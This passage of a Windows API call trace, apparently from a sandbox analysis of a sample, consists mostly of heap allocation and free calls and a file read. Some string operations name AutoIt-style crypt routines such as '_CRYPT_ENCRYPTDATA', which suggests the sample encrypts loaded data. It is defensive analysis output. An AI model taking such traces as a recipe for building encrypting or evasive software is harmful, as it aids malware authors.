dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0122.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0122.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0122.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0122.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.491] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0122.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0122.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.491] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.491] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0122.491] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0122.492] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0122.492] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0122.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0122.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0122.492] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.492] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e00020 [0122.495] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0122.495] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x10000, lpOverlapped=0x0) returned 1 [0122.498] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x8e62, lpOverlapped=0x0) returned 1 [0122.499] ReadFile (in: hFile=0x2a0, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0122.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18e62) returned 0x49aa010 [0122.505] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e00020 | out: hHeap=0x1780000) returned 1 [0122.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0122.507] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0122.507] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18e62) returned 0x49c2e80 [0122.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.509] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0122.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0122.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.509] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18e62) returned 0x49aa010 [0122.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0122.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9c8 | out: hHeap=0x1780000) returned 1 [0122.509] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0122.510] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0122.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0122.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0122.510] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0122.510] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0122.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0122.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18e62) returned 0x49aa010 [0122.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.510] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2720 [0122.510] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25b0 [0122.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0122.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.511] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca538 [0122.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0122.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0122.511] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18e62) returned 0x4506008 [0122.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0122.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.512] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0122.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0122.513] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0122.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0122.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0122.513] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0122.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.513] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0122.513] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0122.514] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0122.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0122.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2530 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0122.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca8e0 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0122.514] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0122.514] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0122.514] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0122.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0122.515] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0122.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0122.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0122.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0122.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0122.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0122.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0122.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0122.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0122.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0122.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00a8 | out: hHeap=0x1780000) returned 1 [0122.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0122.516] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0122.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43920d8 [0122.516] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0122.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43920d8 | out: hHeap=0x1780000) returned 1 [0122.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9b8 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0122.516] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0122.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0122.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0122.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0122.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0122.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0122.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0122.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0122.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0122.517] RtlAllocateHeap (HeapHandle=0x1780000, 